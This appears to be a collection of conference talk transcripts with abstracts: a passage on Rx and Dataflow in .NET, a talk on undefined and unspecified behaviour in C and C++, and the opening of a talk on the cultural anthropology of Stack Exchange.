it's going to go zero, one, two, three, four, till, you know, if you want forever. But I'm going to say then I'm going to take 20 of those. So instead of going forever, I only take the...when you hit 20, stop. Okay. I'm going to say observe on a dispatcher. Okay. So when I get to this point, this function here, I'm going to be running on the UI dispatcher because I'm going to drop the value that's in there into an observable collection that's bound to the UI. And the subscribe method basically says, okay, you got an item called this function. But call it on the dispatcher thread, generate 20, and go through there. So let's go to RX and generate periodically. So this is going every quarter of a second cranking one hour for 20 items. That's real cool. That's step one. The next thing that I like a lot with this is observable. We're doing the same thing, but we're going to say buffer. And the example, the trading example I'm getting to in three minutes, within three minutes, is doing a lot of buffering. So this is going to say, instead of giving me every time it shows up, collect them all for this amount of time, which is one second, and then give me the group of them that was collected. So this should, in theory, give me four at a time. Sometimes it's three, never five. So we go run this. Let's see here we do batch. The second one always comes up four, five, six. I don't know why it's peculiar to this example, but so it's only given to me every second instead. And this continues, this one goes on forever. I notice I didn't have a take in there of 20. So to stop this from going, every one of these observes returns an idisposable. So to stop things, you just call idispose, disposable.dispose, and it stops them. So if you want to clean them up, that's good. So those are the two useful things that I found in Rx for the kind of work that I do these days. I'm going to show you how that all pulls together, because we'll be back to this guy. And let's run this again, and we'll see what's going on here. I want to make sure, I want to run it to code here real quick. And to end examples view model. Okay. Here's the coup de grace of all this. Okay. When I press that start button, this method gets called, and there's some things that's keeping track of, but I'm basically saying I want to, on an interval of some amount of milliseconds, which up here is defined as one millisecond. That's as fast as you can schedule things on the thread pool. Get in there if you do more. I want to take 5,000 items. So I say I want to take the first 5,000 items. So basically 1,000 items a second for five seconds. Okay. So that created an observable. From that observable, I'm actually doing a link statement, because that observable is going to give me 0, 1, 2, 3, 4, 5, blah, blah, blah. This is actually generating some mock data flying into the system. So what's the security? Well, I'm just using numbers, you know, like a stock or bond by name. I'm just using a number. And I'm picking which field to use and a value for that. So for every one of those events, I'm selecting creating an update item. And this creates another observable in the generator observable. So from that generator, I'm then going to say I want a buffer based upon this time straight. So that interval is, right now, I've got that at 100 milliseconds. So instead of 1 every millisecond, give me 100 every 10th of a second. We're slowing down that flood of things in, of things coming in from other systems, right away, right here. And then that's saying, hey, this is doing some work called conflation, which I don't have the time to get into right now. But then passing down. So then I start doing some data flow. That was all RX up to now. So now I'm going to create a transform block, which really doesn't do anything. This is going to pass downstream, but it's going to allow me to specify higher degrees of parallelism to go in here.
|
Join Michael as he gives a practical overview to programming responsive and highly concurrent / parallel applications using Task Parallel Library, Async/Await, and Datalow networks in .NET. These three new additions to .NET provide a new, and when understood, much easier way to coordinate multipel tasks within your application, allowing you to focus on what you need to do instead of the details of how to do multithreaded programming. We will look at common patterns of conurrent programming made simple with TPL, how async/await helps to make TPL easier, and how Dataflow networks can be used to orchestrate data concurrently in your application.
|
10.5446/51483 (DOI)
|
Thank you for coming. This session is about deep understanding of both C and C++. But I have C has certain issues that we are not going to cover here, so I will only be talking about C++. And I am one of those who considers C and C++ to be completely different languages. They do have something in common, just like Java and.NET have something in common, but they are different languages. And I find that important. So as programmers, we are used to sitting at the keyboard, typing, feeling confident, masters of the world, this is our domain, we are invincible. And then once in a while, someone comes and bites us. And this is more common in C and C++, as in any other language, I guess. And the shark is bigger than most, because it's really, really bad what you can do if you don't know exactly what you are doing in C++. So just to warm up, I would like to give you the audience a small exercise. And I hope that you will, well, actually I don't want, team up with the person next to you and discuss what you think this will print out. And this is the warm up question. Discuss with the person next to you. What do you think it will print out? I don't hear any discussions. Take the next person. Because there will be several of these exercises. This is a good warm up. It's getting slightly harder than this. And there are no completion errors or something like that. It's not fun stuff going on here. This is perfectly fine code. But of course, since it's kind of a small snippet to demonstrate something, it's nobody would write code like that, of course. Okay. Let's have a look at what's happening here. We are entering main. Then we have an expression here, sub-expression, that is going to be evaluated. And it's calling foo. And foo is just printing the argument and then returning the argument. But it's calling foo two times and then assigning it to i and then printing it out i. So what do you think it will print first? Any suggestions? Three. Yeah, I like that answer. Four. I like that answer as well. No, it's not undefined. It is unspecified. But thanks for suggesting that, because that is a key thing. And this is the example of unspecified. And on my machine, I get three and then four and then seven. And for the next one, I get four, three, and then seven. But the key point is that you can also get four, three, seven, three, four, seven. Well, any combination like this. And this is an example of unspecified behavior. And c and c++ are among the few languages out there that does not specify the evaluation order. If you write the code snippet like this in mostly any other programming language, you can assume a certain evaluation order. And that is what we will be used to. So if you move from another language into c and c++, this is one of the things that will might surprise you. And if it doesn't surprise you after the first few months, maybe after the next first few years, and maybe after 10 years, I have met several programmers that have been programming for 15 years and they never knew this. And suddenly they say, ah, that's the reason why my log messages come out in the wrong order sometimes. Because they have functions which are logging. And suddenly it just looks like it's random. And they had all sorts of explanation for why this happened. And they never kind of realized that the evaluation order is not specified. And it is actually so, although I've never seen it in real code, in real life, but it's actually so that according to the standard, every time you run through it, it can give different evaluation order. So it's a liberty that kind of the abstract machine or the execution machine can do. Yes, there is a question there. Oh, yeah, yeah. And that's the reason why I kind of introduced it as since we are trying to show an example on one page, then some of the code will look a bit strange. Yeah, so, yeah, that's true. I've given this talk a few times. I know usually what's being discussed. But this is an example of unspecified behavior. And why is it mostly unspecified in C and C++? Do you have any suggestions for that? Because optimization is suggested here. Sequence points, that's very good. We will cover that one later. It's not actually called sequence points anymore. But that's usually when a program, a C and C++ program moves on to the next level, they start learning about sequence points. It is possible to program without knowing sequence points, but usually you create bugs instead of good programs. So, but optimization, that is the best answer, the optimization thing. But while I didn't write it on the slides, I think one of the reasons is kind of a bit laziness as well. Because for some type of expressions, it's much easier to write a compiler if you don't need to worry about it. And this is something that we'll look at later. But certainly optimization is the key thing. When you don't specify the evaluation order, you can have a big expression. And you can let the compiler reorganize the evaluation of the expression in any order and then create a pipeline of instructions and then just churn it through the system, through the CPU, to produce a result very quickly. Having that information, now try to reason about this exercise. And then you have to do it with the person next to you, because this is something that is kind of impossible to do by yourself. I knowrado as doing quality So does anyone want to try to give a comment? I would like to give me a number. What will print in your development environment? That's important because I will ask for the theoretical answer afterwards. But what will happen in your development environment? You think? 14 is suggested. Everyone agrees on 14? 11? I like that answer as well. 13? That's a good answer. Now it is undefined. Yes, so this is undefined. But it will usually print something in your development environment. But I've only heard 11 and 13. I think you corrected 14 into 13. Any other suggestion? It depends on if it increments 5 before. So because the evaluation order is not specified, then you don't know when the side effects take place and how it's taking place. And C and C++ deals with that by saying if you have two side effects happening at the same time in evaluating this expression, it's undefined behavior. I don't care. I just give you whatever. And if on my computer, and this is real, this is not something I've just invented, it took me some time to find exactly this answer. Now this code snippet, I was reading assembler and assembler and assembler from different compilers to realize how they actually compiled incorrect code until I said, oh yes, this must give me... clang, gives me 11. Someone suggested 11. Intel compiler gives me 13. And GCC gives me 12. And it's interesting because you don't get any warnings either. It just gives you a number. And this is a classic example of undefined behavior. And the problem is on this slide. And you might say, nah, nah, nah, this doesn't happen. But the thing is, it does happen. Unless you have a very small code base with only a few developers. If you're working in a large code base with lots of developers and somebody have different backgrounds, et cetera, and some of them don't even know the rules of sequencing and sequence points, once in a while they will produce this. Not always as obvious like this, but it could be as a result of maybe a macro, or it could be hidden like undefined behavior in other ways than this one obvious here. And actually this increasing the index into a vector and using the value at the same time is not very uncommon to find actually in a large code base. Yes, there's a question. Is there a problem on a specific platform, or do you switch between platforms? It is something that you notice more often when you switch between platforms and when you switch compilers. And very often when you change the optimization level, very often when you take a code base and you try to compile it with a new compiler and it doesn't work, it's because you have undefined behavior somewhere in your code. So you take it from an Intel CPU and into an ARM for example and you get the difference results. Very often it's because you have undefined behavior somewhere. But as long as you're staying the same. And yeah, and don't, if you stay on the same architecture with the same compiler versions and never change the optimization level, it's more seldom that you see these problems. But you could see it, yeah. If the plan is aligned correctly, et cetera. So, and the interesting thing as well is that you cannot rely on your compiler to detect this. Now on my machine, I put on all the flags. No warnings, no warnings. I was actually surprised to see that the C++ version of GCC gives me a warning because I know that the C version of GCC with exactly the same code does not give me a warning. I need to study this a bit more why does it actually detect this. Because the compilers usually don't see this and even if they see undefined behavior, very often they are reluctant to report it. Yes? They are not sure either. That's a good observation. So they are not even sure about it. And the reason is that it's... Well, you can see here. Why don't you get a warning or an invalid code? Any suggestion? Too hard. Too hard? That is a very good answer and sometimes you could also say impossible. Because some of these kind of undefined behavior occurs between compilation units and the way C and C++ works. If you can only see one compilation unit at a time, then it's impossible to see it. It's like having the blind spots on you. The compiler cannot see it. So instead of pretending like it's able to see the... see the invalid code, it's rather saying may or not reporting it at all. But also there is a very good reason in C in particular, because one of the design goals of C has always been that it should be the first language to execute on a new hardware, apart from assembler. And that also means it's a design goal that for an experienced compiler writer should be able to write a C compiler for like three months, I've heard. Something like that. And if you talk to compiler writers, they will let you know that 98% of their time is spent on making... trying to make some reason out of invalid code and give correct diagnostic messages, etc. They can always compile a happy story, but the corner cases are very difficult to diagnose. So it's important for the C standard not to impose rules on the compiler that you have to diagnose incorrect and all kind of ill-formed code. And this attitude has been adopted by the C++ standard. I'm not sure if that is necessarily such a good idea. And there is now actually a study group in the standards committee, which I have been invited to join, actually, to look at how can we get rid of some of this strange behavior with unspecified and undefined behavior in C++. I don't think it is possible to do that in C, because if you add too many draconian rules to C, then it will not be the first language after assembler on new architectures. And this leads into how you should think about C and C++, because they are really more like portable assemblers. They might hide the fact that they are portable assemblers, but they are portable assemblers. And I don't believe it's possible for a large group of people to write correct code if they don't have a good understanding of the underlying hardware and the underlying CPUs, as well as not making assumptions that this will be true on all kind of architectures. So I actually think that being able to read and write assembler and understand what happens under the hood is essential for C and C++ programmers. And in addition to, of course, the history and the design goals of those languages. So we brought a slide deck about this thing called the Deep-C and C++. Just curious, how many have seen this slide deck? I see four or five hands. If you are interested, you should go and have a look at it. We thought it would be popular, but we had nearly 30,000 downloads the first day of this 445 slides, and 200,000 downloads the first week, and we were just overwhelmed with email from all around the world and we had been programming C and C++ for decades, and we didn't know this, where can we find more information about it? And that is the reason why I feel it's important to kind of spread this knowledge, which we are going to do. So let's just start with some basic stuff here. What will this piece of code write? I'm not going to do an exercise on this, but you would expect it to write 4. We know that. Now let's change this one into static. What does it write now? Yeah, we are at a very simple level, still. 456. What happens now? Undefined, I hear. Anything else? 1, 2, 3, yeah, assigned to 0 is actually initialized to 0. Initialization and assignment is slightly different in C++, so it's initialized to 0, and this is something that we know for sure. That's according to the language specification. So variables with static storage duration do get the default value, and in this case 0. If it's an object, the default constructor will be called in C++. And yeah, if you have the privilege of only reading and reasoning about your own code, you can have these rules that say, I'll explicitly initialize it, but sometimes you have to reason and discuss code written by others, and then it's very useful to actually know this. And it's also useful to know why you get 0 there. We'll discuss that later. What happens now? Who knows? That is a very good answer. Any other suggestions? Naisal demons. Naisal demons, that's a very good answer. Anything else? So what do you think will happen in practice though? So that's two very good theoretical answers. The first one, you will essentially just get whatever is in the memory location of A, right? And that will be implemented for one. And the second on the server, I don't know, you will just reuse, most likely, you will reuse the memory location, at least then you kind of get the difference. And I'm going to repeat that. So the suggestion is that the first time you run it, you will get a garbage value of A, and then A will be at the same memory location, so the garbage value will be increased. I think that is a very good answer, and as long as you don't make an assumption of that, I think it demonstrates a deep understanding of C and C++. Well, they certainly don't get the default value here. And the question is, does it print garbage, garbage, garbage? And the answer there is, maybe? It could be initialized to zero in, hello, we will see that later, yeah? It could be initialized to C, C, and C++. It could be, yeah. Yes? But in this case, you really take a pile of garbage? No, the compiler doesn't see it. So why do you have the object of static storage duration get the default value, but with automatic storage duration, will not get? And the reason is all about execution speed. If you understand that C and C++ is all about execution speed and optimization, then you can derive a lot of these answers yourself. As long as you know approximately what happens with the variables, because static variables, they have a one-time initialization phase. In C, for example, it's quite common to put them all in the same memory space and then just do a memset of the whole area so they get to zero. Now, it's slightly more complicated in C++ because the initialization happened the first time the program counter goes through that area. So let's try to run it on my machine. This is what I get. So combining your answer and your answer gives a plausible explanation of why we get this because I'm compiling without optimization. So the compiler will try to be helpful, so it's actually resetting my stack to zero. So the garbage value happens to be zero, and combining with other insight, which was that the same garbage value will be reused and reused and thereby increased. He doesn't know this, of course. And I think that is exactly what I say there, so I'm not going to repeat that. And to have this kind of insight is very useful, but you should also know that. Since this is an example of undefined behavior, at least in theory, you could get happy birthday, and that's kind of a nice bug to have. You can also, of course, get this formatting your hard disk or launching a missile or whatever by the program that has been compiled. But the surprising fact, although I will struggle a bit to kind of prove it or to find some real examples of it, I have some anecdotes about it, though. You can also get this. By writing code that is not well-formed, you can confuse the compiler in such a way that the compiler will do bad stuff. And this is something that we kind of see because you can have a piece of code somewhere in your codebase and a piece of code somewhere completely different in the codebase, and because that one has ill-formed code, the compiler gets confused and starts producing garbage over here. So even if you never execute the code with undefined behavior, you can actually get it somewhere else in your code. And I know it was... I've never seen it myself, but I read about it, that GCC at one point, I think it was the Pragma ones when that was introduced into the language. The compiler writers of GCC, they decided, oh, we don't like Pragma ones. That's probably a Microsoft thingy. But, oh, it's unspecified behavior. That means we can do whatever we want. Let's fire up Nethack, I think it was, and Emacs playing Toborob Arnoy. If the compiler kind of found Pragma once, and then they just wrote the note into the manual and that's whatever we're going to do. So at least they documented it. So you can get this kind of formatting hard disk because the compiler writers want to pull your leg, but you sometimes get it because you're correcting the state of the compiler because you have undefined behavior and incorrect code. And then the quotes that you mentioned. This is what we call the nasal demons. From a quote from Kubstead C, when the compiler encounters undefined construction, it is legal for it to make demons fly out of your nose. So even for the simplest example like this, a few of the compilers actually see it. And if you generate an example, well, look, my compiler can actually show, give me a warning, then give me some time and I can come up with this equal, simple thing that the compiler will not be able to see. Yes? This very simple one, that's true. But yeah. And they are really good. And that is a good time to actually recommend in big code bases you have to start using static code analysis. And also it's a good idea to make sure that your code compiles with several compilers because they typically see different things. But we are in our code base, which is like three, four million lines of code that we have been maintaining for 20 years. We are running all the tools that we can get and we still find things that none of the tools can actually see. So a good simple trick though is to default to always compile with optimization. So instead of defaulting, compiling without optimization, compile with optimization because there are two things you get nearly for freedom. First of all, when you ask it to optimize, it needs to consider larger chunks of code together. So it's more likely that it will actually see. If you compile without optimization, it will just compile line by line and forget what happened in the previous line. With optimization, it will look at the larger context. But the most positive effect is that you get kind of strange results. And I mean, what you suggested earlier that the same garbage value will be reused, you see how it is not being reused because things are optimized in ways that you will typically get strange answers. One question about optimizing code. How is it to analyze for example a crash dump? Yeah, and that is... I hope you ship with the optimized code at least. Analyzing crash dumps, analyzing the sampler produced by optimized code is very, very difficult because the program counter is just... It's just jumping around in your code in patterns that are impossible to understand. So when you compile without optimization, you are actually also asking the compiler to create code that is so simple to follow for me as a human being. So that is a downside of compiling with optimization, of course. But the recommendation then would be default, prefer to compile with optimization and when you want to debug and you find it too difficult to understand what is actually being produced, then you switch off the optimization and go into debug mode. It's late when you get the crash dump. If you ship your code in debug mode... In the optimized mode. If you ship your code optimized and you get in some situation that you get the crash dump for, it is not possible to analyze it. I see your argument, but I do recommend that you ship CNC++ code in optimized, not debug mode. But that could be different from what kind of application you are working on, of course. So now we know a few things. So I guess most of us managed to guess the plausible explanation of this code snippet. And it is because... It is because of the stack frame and the activation frame that is used by a lot of architectures. But by this example, I want to show you a typical example of the... And this is true for... It doesn't matter how much you know about anything, really. There will always be an area that you don't know well enough. So when you try to reason about something, you just come up with all these strange explanations. And when you listen to CNC++ program and try to kind of reason about certain things, it is sometimes easy to see, but yeah, of course, this is an area that he obviously do not get. He has a wrong conceptual model for it. I actually met programmers that think there is something magic happening inside when it comes to allocating variables and initializing objects. And there is no magic there. It just looks like magic if you don't know what's happening. And this is the symptom of having an invalid conceptual model. So if you believe that the Earth is the center of the universe and you see kind of the moon circling around and you see the planets and the sun circling around, and that's what you believe in, then sometimes you see things that are slightly strange, the epicycles and the deferents, and you try to come up with explanations for it rather than adjusting your conceptual model. And this is important. This is an important mode for certainly programmers. And that is to always think about, is my thinking correct here? And of course, the plausible explanation is this activation frame that I was talking about, and that is the reason why this garbage location here happens to be the same garbage, the location that this one was written into. But that is of course only true if you run with debug mode. But actually most compilers, most architectures give you a 4 to 2 if you compile it without optimization. And if you do it enough times, then you might think that's how it should work. But of course, that's just in practice and not in theory. So going back to this example, which prints 4.04, what do you think happens here if I switch it from plus plus a to a plus plus? What does it print now? And of course it prints 4.04. But I've met programmers that thinks it prints 3.33. And the first time I met programmers that thought it was 3.33, I don't know what's happening. Why do they think it's 3.33? Until I realized that the knowledge of how things are sequenced in C++ and the sequence points that we're mentioning earlier, and now it's called sequence before, etc., the rules of sequencing, is not well understood by C and C++ programmers. So therefore, while we have experience that says this will increment and print 4.04, we don't necessarily ask an industry and a group of C and C++ programmers. We don't know this well enough to really argue for why this one is updated before we are going to use it here. And that's what I'm trying to introduce a bit now. That's the rules of sequencing. So if you don't know the rules of sequencing, you are very likely that you will come up with these strange explanations. So let's do a small exercise again. Which of these prints 42? And discuss with the person next to you. Or actually, most of them prints 42. You can reduce the problem to which of them do not print 42. And if you are able to answer that question, then I think you are at least... you have some understanding of C++. But if you are also able to explain and kind of reason about and demonstrate, that's the reason why it will always print 42 here. Then you are demonstrating deep understanding of the programming language. Okay. The jeopardy question first. What do we think about the first one? Will it print 42 or not? Yeah, it prints 42. Does anyone want to suggest an explanation, kind of argue for why you know it's 42? Hmm? Sorry? Yeah, alright. Yeah, yeah, yeah. The 42 is, of course... No, I was more thinking about the code. Because there are separate statements, that's getting there, but it's not strong enough argument. There is a slightly stronger argument that you can make. But the semicolon is a slightly weaker argument. So I like the statement better than... separate statements, better than the semicolon argument. The order in which the statements will be executed are defined, or actually specified. Yes. So they are specified. That's close. There is actually an even closer, an even stronger argument there. This is a full expression. So it's not a sub-expression of something. And since this is a full expression, there will be, in the old terms, a sequence point after that evaluation. So you know all the side effects will have taken place. Now, if you take a full expression, you also have, and with the semicolon, you have a statement. So you were close. And that is the reason why we know this will be executed. The statements will be evaluated. And the side effect will take place before that one. That full expression is evaluated. The next one, then. Because then the semicolon argument cannot be used anymore. Does everyone agree that this is definitely 4-2? No? Do you side effects that? Does it treat first or does it compare first? At least I think it compares A and 4-2 first and then increments A. But does it treat first or does it compare first? That's your suggestion? I think it's just the same example as before. Yeah, it's the same example as plus before. Because this is an operator that doesn't introduce a sequence order. And so, therefore, you don't know in which order the sub-expressions of this full expression, this is a full expression from there to there. You don't know how the sub-expressions are going to be evaluated and when the side effects will take place. So this is undefined. What about the next one? It's defined. Why is it defined? Because there's an early out there on the table. Yeah, early out is a word that is not mentioned in the standard. But see what you mean, any other? Short circuit is not really mentioned in the standard as well. It might be in the comment in the standard. Well, I think it's because you don't have to test the operator. Yeah, and that is... It's illogical through and the reason why they have changed the rule slightly from here to here is to get the effect that you were talking about. But I haven't heard kind of the standard rule. Yeah? It will probably not execute it. It will typically not execute it. Well, the reason is that the standard says that there is a special rule for this logical and a logical or in that it guarantees a certain order of sequencing. So it basically says this expression is evaluated before that one. It says in the standard. And therefore you know that the side effect will have taken place before. In the previous standard, it talked about this one introduces a sequence point. It doesn't talk about short cutting or erling out of etc. It used the sequence point. This introduces a sequence point. And now it's saying that this is a sequence before that one. So that's the reason why we know it. Next one. Definitely 42. Definitely 42? Are you sure about that? Well, I guess most of us are sure about that. But at the same time, it's a bit difficult to argue for it. I've given you a few hints already. So I hope that some of you will not try to repeat those words. Why? Because there is no semicolon here. Full expression. Full expression. The reason is that this is a full expression. So after a full expression, in the old standard we said there will be a sequence point. Now we said that this full expression will be a valid before the next. Yes? Why did they remove the term sequence? The question is why did they remove this term sequence point? The reason is that in the new standard, it's also introduced concurrency. And when you have concurrent access to things, then sequence point became very, very difficult to reason about. I'm not convinced yet that I find it easier to reason about sequence points than before sequence after and things like that. But they've probably done a very good job there. So I'm learning myself to start using whencing and sequence before instead of talking about sequence points. It makes it easier to reason about concurrent codes. So we know this is 4 to 2 because this is a full expression. The next one. Undefined is the suggestion. Well defined, yeah? Yes? And actually this is sometimes called the sequence operator. So it is actually introducing a certain sequence of avalations. So with this comma operator, you're guaranteed that it will go one by one. Sorry? No, I don't think you can destroy things with overload in this case. Let's discuss that afterwards. You're already free. Usually defined, come up with it. But an overloaded operator is the function call. And as we will see later, there will be a sequence before the call. The next one, though. It returns a in both cases. It does. And that's just laziness for me. It is a full statement. And this one has also a special rule like this one. There are actually these three operators. That one, and logical and now or, and this one are mentioned specifically about this sequence order together with this sequence operator. So this, we know this is 42. What about this? Seven? 42. And the final? It is set to 41. This is undefined, but why is it undefined? It's... Yes. Which order is it evaluated? And this is something that for people that I use to audit the program languages might be a bit confusing. But in C and C++, the assignment operator is an operator. So it's just like plus or minuses or whatever. It just has an interesting side effect. You don't know whether this has been evaluated before the assignment or not. And this is... No, no. It's undefined. It could format your hard disk. It could destroy all the parts of the code. Doesn't matter what type of increment. No. Doesn't matter which type of increment. If you update a variable, if you make a side effect on a variable, you cannot read its value in the same full expression. And that's what we are doing here. We are kind of reading or writing to the value of it. So this is a classic example of undefined behavior. Can you explain why? Because first we assign after we know the right hand side. The only explanation I can give is that the standard explicitly says that you cannot have a side effect on an object and then use that object in the same expression. Then you have undefined behavior and the compiler can do whatever it wants as we will see later. One question. Could I write a is equal to a plus one? That will work. Yes. Because then you are not... Yeah. That will work. And that is... In some way you can say it's a special case because it's described in the standard. How it's going to work. But you are not updating the variable twice there. So this one is guaranteed to be 4 to 2 because we do have a sequence before we go into the function call. And this comma operator is something completely different from this one. Of course. So this one is fine. What about the next one? I like that answer. It depends on the implementation of foo. Because if this is a function then you are guaranteed to have a sequence point or a sequence before. But if it's a macro then you don't have that guarantee. And well, if it's an object it will also be like a function call. So you have this guarantee. But the interesting thing is that in C++11 and in C11, if this is a function call, it's easy to argue this is always defined. This will print 4 to 2. But I haven't been able to find the wording in C99 that kind of guarantees that even if this is a function call this will not be undefined behavior. And I have tried to ask several people and they are not... They think they know the answer but they have not been able to convince me yet by showing the chapter and verse in the standard and said because of that, that, that, that, that. This is definitely defined in C99. But that's the side. But the key thing is if this is a macro then you can have undefined behavior. So talking about undefined behavior, you might think it is a local thing. But it isn't as a local thing because when you compile C and C++ you typically compile each translation unit by itself and you might have this innocent looking code. But do you see what can happen here? A few months or a few years later, someone comes in and calls this method, this function, with a big seed. You have a signed integer overflow and that is explicitly in the standard sense that this is undefined behavior. And so you get the whole system is the whole program, the whole code base is undefined. So if you have this situation you can end up like this and answer is 3.1416926 blah blah blah. Anything can happen. If this applies to a 32-bit machine, if you are on a 64-bit machine you still have some bits to go on before you get the overflow. Yes? How should you write that if you want to be sure of the answer? Yes. And that is, the question is how should you write this to be sure of the answer? You have to write it yourself and you have to do all the logic to make sure that you don't get an integer overflow. And sometimes you just want to make it correct, other times you just want to get a message if it happens. And that is one of the reasons why it's so convenient to run on a virtual machine because the virtual machine can tell you. And also on a virtual machine you can just say this is true in our world. And typically on languages that run on virtual machines they don't have all this unspecified and undefined behavior that we are talking about. So, but in C and C++ you don't get this extra code to kind of save your ass. So, here is a quick exercise. What do you think this code prints? We don't have time to think too much about it, but given some experience you might have this feeling that... It will probably print true with a suggestion here. Is there anything other suggestion? Yes? It will probably print false or... Any other suggestion? Suppose that we call this function... I'm just building up an argument here, but we do something else before we call foo. And when you know this is not being initialized so it will have a garbage value. So we just create bar which puts in a garbage value there. And it doesn't put in 0 or 1, it puts in 2. And you know, that can happen, this is just garbage. So suppose it was 2. If I compile it with gcc since 4.7 for the last 2 years or so with gcc, it has given me this answer. This is real stuff. This is not something that I have... Oh, I should have mentioned that this is... There's another guy who blogged first about this last summer on the behavior of 4.7. So why does this happen? Well, as always you can go into the assembler code and have a look. And this is what happens. gcc assumes that... Well, bool is my type. I refuse to accept the fact that it can be anything but 0 or 1. So it just produces code. That first checks is it 0? Compare regular with A. And if it isn't, then we just jump over. And then it does an x or 1 and checks with 0 again and jumps over. And this is fine if it's 0 or 1 because then it will print the correct result. But if it's 2, both of them will not be 0 and it will print b is true, b is false. That it was happening in the assembler. You can look in the assembler and see. So going back to the example that I showed you earlier that had all these variations of 11, 12 and 13, if you go and look at the assembler, you will see that the different compilers, they use different strategies for evaluating expressions. And that is the reason when I understood how they evaluated, I could actually construct this code snippet to show that they all gave different results. And if you look at the assembler, you can get the answer directly. So they don't try to be bad, they just have a different strategy for doing things. And it gives you the strange results that you saw earlier. So what's wrong with this code? It's crap. The standard sense that this is invalid code. The problem is that it's updating multiple times between two semicolons. Maybe these are all statements that can be used. Here is a very correct one, referring to 1, 9, 15 in the standard, which is fine. And here is a fifth explanation of it. Now, if I'm going to judge these answers, I would say, yeah, of course it's crap code. I agree 100%. The standard sense is invalid code. I don't like that answer. The standard never talks about invalid or valid code. It talks about well-formed and ill-formed. And basically everything that is not defined by the standard as this is how C and C++ is working is by definition undefined behavior, basically. This is certainly not correct. We have seen that before. Having this idea that these sequence points happen at the semicolon, or semicolon defines whether it's sequence before or after it, doesn't take you very long. You have to understand about these kind of full expressions and the special cases in the standard of, for example, the logical and, etc., and before you call a function and so on. This one is, yeah. I'm supposed to have a full function. Each of the time it has a plot plus i. Yeah. Is it four minutes? Sorry. Yeah, okay, sorry. I'm short of time. Okay, sorry about that. Yes, quick. How do parentheses influence the sequence point? The parentheses never influence, or never introduce the sequence points, because the evaluation of an expression happens in two phases. First, they are kind of... I skipped that one because... But it happens in two phases, and the semicolons, the parentheses, does not change the initial evaluation of things. So it won't affect the side effects there. But while this one is correct, this one is correct, I like this answer the best. It's showing this deep understanding of c and c++. You don't have to kind of refer to the standard directly. I think it's fine to... You can probably write correct c and c++ without knowing everything in the standard. But then you have to work on your kind of conceptual model, your mental model of the program all the time, and you should be able to kind of reason about it. This is undefined behavior because the evaluation of an expression is mostly unspecified. Therefore, we get undefined behavior, and when we have undefined behavior, anything can happen. I think this answer demonstrates a deep understanding, and it's where we want to be if we program c and c++. So, who is releasing code with undefined behavior? I'm sure none of you do. Well, thank you. You're my friend because I have been working with c and c++ for more than 20 years, and with insurance applications, traffic control systems, seismic exploration systems, and supercomputing, and banking systems, and now I'm working with video conferencing and telepresence equipment. I know in all of these, shipped to the market, sold to the customers, they have undefined behavior in there. I know, and it's not only me that have written it. I have been working together with colleagues. So, the only thing you can hope for is to reduce the number of undefined behaviors in your code. There are some other famous examples of undefined behavior, and you might say, well, there are at least some people in the world that control this master.io program in c and c++ so good that they never introduce undefined behavior. Well, this is from the portable C compiler, which used to be a reference compiler for C for a while. It has been worked on for 20 years by a lot of people. It's open source. It's out there. And I compiled it, and with the latest, latest, cc compiler, and it showed me this line, which is undefined behavior, and I was like, yes, even the compiler writers, they get it wrong sometimes. This is probably produced by script, though, since it's a senseless statement, but still, this is undefined behavior. So the ending argument is that since there are not really high-level languages, but more like portable assemblers, you have to understand what happens under the hood. And always work on your conceptual model, your mental model about how this thing is working. But if you do, if you do understand what happens under the hood, then I think you have a fair chance. Thank you very much.
|
Programming is hard. Programming correct C++ is particularly hard. Indeed, it is uncommon to see a screenful containing only well defined and conforming code. Why do professional programmers write code like this? Because most programmers do not have a deep understanding of the language they are using. While they sometimes know that certain things are undefined or unspecified, they often do not know why it is so. In this talk we will study small code snippets of C++, and use them to discuss the fundamental building blocks, limitations and underlying design philosophies of this wonderful but dangerous programming language.
|
10.5446/51484 (DOI)
|
Thanks. Thank you. Let's see if, oh look, it came up. Good. I'm going to talk a little bit about Stack Exchange, the cultural anthropology of Stack Exchange. Cultural anthropology is a class that I took at university, which was the most boring thing I had to study. And my university, Yale, had the option to change classes at the last minute. So there was a period of three weeks when you could take any class you wanted, and then sort of at the end of that period you had to choose five, I think, or four or five. And accidentally I failed to withdraw from the cultural anthropology class in time and was stuck in this very boring thing learning about the Trobriand Islanders and exchanging yams. And the, I can't remember who, but there was a group of people in Canada that liked to trade blankets a lot. And I thought it was really boring. And I forced myself to take the class, and I forced myself to get a good grade in it in order to practice the surviving of very boring things. But the punchline is that it turned out that that was one of the most important things I had to learn because what I discovered is as soon as you're building systems for millions and millions of people, anthropology is actually more important than programming and object-oriented design and any of the other things that you're going to learn about in the next two days. So that's what this talk is about, is about the anthropology of the system. Last time I counted we had something around the order of 40 million monthly unique individual human beings that visited one of our websites at Stack Exchange. Either Stack Overflow is about half of the people, 20 million, and about 20 million visiting the rest of the network at StackExchange.com. And if we were a country, we would be the 34th largest country. We would be larger than Algeria and bigger than Canada, that's a good one, I guess, and some other countries there. So, you know, we would be larger than every U.S. state. And cultural anthropology is really the only tool for dealing with understanding and studying a community that's this large. We're also, the other problem is that we're kind of utopian. And by utopian, I mean that not only are we trying to study a country and understand, you know, how people work and how they think and how they behave, but we're trying to rebuild it in our own image and we're trying to make sort of a perfect utopian world on Stack Exchange for whatever that means. And we have sort of very, very high ambitions about how that culture functions and behaves. And this is, of course, radically different than anything I was taught to do as a computer scientist, as a computer programmer. When computers first came out, we were sort of lucky if we could get them to calculate things and to compute things. And indeed, I think that most programmers still spend an awful lot of time imagining that what they're doing is just trying to get some kind of a computation out of the machine in some way and that that's their job. Nobody could even imagine, sort of in the early days of computers, nobody could imagine that they could be used for communication at all and that therefore computers would become societies and cultures. This is, I learned how to program on one of these things. It was a deckwriter 3 which was connected at 300 bod or 300 bits per second which means it could print about 30 characters per second to a mainframe computer. But it wasn't really until, so sort of the early time sharing systems would print. The later time sharing systems used these, you know, glass terminals, CRTs. This is a digital VT100 and it was called the smart terminal. Smart meant that it had the ability to move the cursor. So, which meant that you could do an enormous number of interesting things like have a full screen text editor, a full screen interface. And the interesting thing about the arrival of the glass terminal or the CRT or whatever you want to call these things, TTYs, I guess this is a TTY. The most interesting thing about when these things arrived is that they could handle a lot more than 300 bits per second. In fact, they could go at the incredible rate of 1200 bits per second because the print head didn't have to keep up and printing technology had not been very fast in those days. And that meant that for the first time you could actually print large strings of text, large blocks of text. And that's when email was invented. And in fact, the general interface for email is what became Usenet, which was sort of the precursor, I don't know if I would call the precursor the web, but it's certainly the precursor to Stack Overflow and to sort of all online discussion, all online discussion groups in question and answer forms. And if you look at 